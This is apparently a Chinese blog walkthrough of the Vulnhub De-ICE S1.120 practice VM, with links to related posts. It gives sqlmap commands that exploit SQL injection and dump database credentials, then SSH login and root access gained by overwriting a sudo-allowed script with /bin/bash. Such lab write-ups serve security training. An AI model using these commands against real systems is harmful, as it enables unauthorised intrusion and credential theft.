De-ICE:S1.120靶机

最新推荐文章于 2025-12-17 08:26:24 发布
原创 最新推荐文章于 2025-12-17 08:26:24 发布 · 414 阅读 · 8 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#笔记

查看MAC地址

将kali和靶机都设为仅主机模式

改为1网段

扫描IP

查看开启端口,可以看到端口 80、443、3306、21、22 已打开

访问192.168.1.120

点击Add Product

提交后,将显示以下页面。

有id值,看看有没有SQL注入

使用工具

python3 sqlmap.py -u "http://192.168.1.120/products.php?id=1" --batch

存在SQL注入

python3 sqlmap.py -u http://192.168.1.120/products.php?id=1 --dbs --batch

python3 sqlmap.py -u http://192.168.1.120/products.php?id=1 -D mysql --users --passwords --batch

通过SSH测试它们,所有用户都可以登录系统

使用用户名作为 ccoffee 进行了 SSH

枚举具有 SUID 权限的所有二进制文件。

find / -perm -u=s -type f 2>/dev/null

从截图中可以看出,在列出的所有用户中,用户 ccoffee 为位于路径 /home/ccoffee/scripts/getlogs.sh 命令启用了 SUID 位,这意味着我们可以执行 getlogs.sh 命令内的任何命令

此时,我们还检查一下 sudo 文件的内容

在执行 sudo –l 时,我们观察到在执行命令 /home/ccoffee/scripts/getlogs.sh 时没有为此用户设置密码

切换到/home/ccoffee/scripts/目录下

cd /home/ccoffee/scripts/

getlogs.sh 移动到 getlogs.sh.bak,然后使用以下代码创建一个新的 getlogs.sh 文件以生成 shell

使用命令
mv getlogs.sh getlogs.sh.bak
echo "/bin/bash" >  getlogs.sh
chmod 777 getlogs.sh

使用 sudo执行getlogs.sh文件

sudo /home/ccoffee/scripts/getlogs.sh

执行whoamiid命令发现提权成功

陽陽yy
关注
Vulnhub靶机系列:De-ICE: S1.120
汗的博客
03-30 1630
https://www.hackingarticles.in/hack-the-de-ice-s1-120-vm-boot-to-root/ 靶机地址 https://www.vulnhub.com/entry/de-ice-s1120,10/ 靶机设置 靶机默认ip是192.168.1.120,最好设一个对应网段的网卡给它,我的这篇文章有简单指导Vulnhub靶机系列:pWnOS: 2.0另外i...
De-ICE_S1.120超详细靶场实战
weixin_68615160的博客
07-29 259
发现有很多用户,我们挨个登录,发现ccoffee用户可以提权。我们切换到/home/ccoffee/scripts目录下。发现靶机开启了21、22、80、443、3306端口。使用sudo 运行getlogs.sh文件。我们这里使用finalshell连接。发现url地址出现新的参数。第一反应进行sql注入测试。选择产品1,点击提交。
De-ICE_S1.120靶机渗透测试
weixin_58786230的博客
07-29 453
【代码】De-ICE_S1.120靶机渗透测试。
De-ICE_S1.120靶机
m0_61995767的博客
07-29 445
De-ICE_S1.120打靶记录
【vulnhub】De-ICE:S1.120靶机
wbplife的博客
08-11 330
在列出的所有用户中,用户 ccoffee 为位于路径 /home/ccoffee/scripts/getlogs.sh 命令启用了 SUID 位,这意味着我们可以执行 getlogs.sh 命令内的任何命令。在执行 sudo –l 时,我们观察到在执行命令 /home/ccoffee/scripts/getlogs.sh 时没有为此用户设置密码。将 getlogs.sh 移动到 getlogs.sh.bak,然后使用以下代码创建一个新的 getlogs.sh 文件以生成 shell。
Vuluhub靶机 De-ICE: S1.120(渗透测试详细)
2301_78721909的博客
07-30 531
Vuluhub靶机 De-ICE: S1.120 (from wuhu)
De-ICE_S1.120靶机 带提权
weixin_71232352的博客
07-30 426
1.查看mac地址并将kali添加一个仅主机模式并使用dhcp分配一个192.168.1.0网段网卡,将靶机设置成仅主机模式。2.使用sudo提权发现不可以使用suid提权。8.发现url有id=1 尝试sql注入漏洞。9.通过sqlmap跑出来用户名跟密码。执行生成的文件并输入id发现提权成功。1.发现是Linux系统。4.首先访问80端口。
3.DE-ICE: S1.140靶机
Sam5ara的博客
01-16 670
vulnhub
vulnhub系列:De-ICE_S1.120靶机
jq_j37的博客
07-30 513
靶机IP为静态IP:192.168.1.120,因此kali设置为仅主机,配置为相同网段。
运放学习笔记
Z97371539的博客
12-13 572
单电源运放是指仅使用单一电源电压(例如,+5V)和地(0V)作为电源供给的运放。也就是说,它只需要一个正电压和地作为参考电压,而不需要负电压。
先立后破:Linux 下“新建管理员 → 验证 → 禁用 root 远程 SSH”的零翻车笔记
weixin_45626288的博客
12-12 539
本文提供了一套零风险的Linux服务器安全加固流程,重点解决等保2.0要求的"禁用root远程SSH"需求。通过"先立后破"原则,先创建并验证新管理员账号的sudo权限,再禁用root远程登录,全程保持root会话不断开作为应急通道。关键步骤包括:创建新管理员账号、配置sudo权限、严格测试新账号功能、安全修改sshd配置、保留本地root登录权限等。文章特别强调验证环节的重要性,并提供了快速回滚方案,确保运维人员不会因配置失误导致服务器失联。这套方法适用于Kylin
Android学Dart学习笔记第十四节 库和导库
weixin_44656996的博客
12-15 750
其他语言中的访问修饰符关键字提供了更细粒度的控制,而Dart使用下划线和基于库的隐私提供了直接的配置机制,有助于高效实现动态访问,并改进了树抖动(死代码消除)。库不仅提供api,还是隐私的单位:以下划线(_)开头的标识符只在库内部可见。当你导入的多个库中,使用了相同的类名时,可以为库起个别名,使用 别名.类名 明确指定所引用的类。使用import来指定如何在另一个库的作用域中使用来自一个库的命名空间。带有通配符_的导入前缀是不绑定的,但可以访问该库中的非私有扩展。
AD学习笔记-36 gerber文件输出
2401_83451707的博客
12-14 294
今天,我们学习如何导出gerber文件,这是我们给板厂的最终文件。
Compose笔记(六十)--TriStateCheckbox
ljt2724960661的博客
12-14 155
 这一节主要了解一下Compose中的TriStateCheckbox,TriStateCheckbox是Jetpack Compose中支持三种状态的复选框组件,相比...
C++基础笔记(二)队列deque,queue和堆priority_queue
qq_43869689的博客
12-12 321
由于deque不完全连续的实现思想,在插入/删除时,如果涉及到新块扩容(增加一个新的block)有可能导致迭代器失效,建议稳妥的做法时涉及到频繁的删除就用list链表,别用的队列实现,或者分两边操作,第一遍只遍历检查,确定要删除的数据,第二遍开始从后往前删除(一般情况不建议删除,加个标记表示这个数据失效就行,比如用一个set或者数组记录哪些元素失效)。关于priority_queue也是差不多。
【大模型】happy-llm笔记
weixin_45207619的博客
12-16 121
今天看了这套课程的第二章到第四章的内容,对自己一直以来好奇的一些llm相关的问题有了解答。将我遇到的问题整理到下面,部分可能没有回答,感兴趣的同学可以去原课程查找。happy-llm是datawhale发布的一套关于llm的教程,链接。
JPA 学习笔记 8:与数据库交互
最新发布
梦幻天空
12-17 430
JPA与Hibernate核心概念摘要 本文介绍了JPA和Hibernate中与数据库交互的核心机制。主要内容包括: 持久化上下文:作为一级缓存,管理实体实例的三种状态(瞬时/持久/分离),确保数据一致性和自动脏检查,提高性能但需注意线程安全限制。 会话管理:演示了EntityManager/Session的创建和关闭方式,强调JPA标准与Hibernate原生API的区别。 事务处理:对比了传统事务管理方式与Hibernate提供的简洁API(inTransaction/fromTransaction),
学习笔记——写时复制(Copy-on-Write)
2301_78295956的博客
12-16 620
摘要:写时复制(COW)是一种延迟资源复制的优化技术,多个调用者初始共享同一资源,仅当修改时才创建副本。该技术通过引用计数和内存页保护实现透明操作,显著提升fork()等系统调用性能,减少内存占用。广泛应用于操作系统、编程语言和存储系统,虽存在首次写入延迟等缺点,但通过批量复制等优化策略可缓解。COW体现了"延迟优化"的设计思维,在资源节约和性能间取得平衡。
网络配置总述 子网1网段:192.168.40.0/24 网关IP:192.168.40.1 靶机IP(Ubantu):192.168.40.2 子网2网段:192.168.192.0/24 网关IP:192.168.192.1 靶机IP(Win7):192.168.192.2 网关服务器IP(Route-M):192.168.209.136我的网关ping不通192.168.192.2
06-05
例如,子网2的Win7靶机应连接到VMnet1,而Route-M网关需同时连接到VMnet1和VMnet8以实现跨子网通信[^2]。 ```bash # 检查虚拟机网络适配器配置 vmware-netcfg ``` #### 2. ### IP地址和子网掩码验证 确认Route-M...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值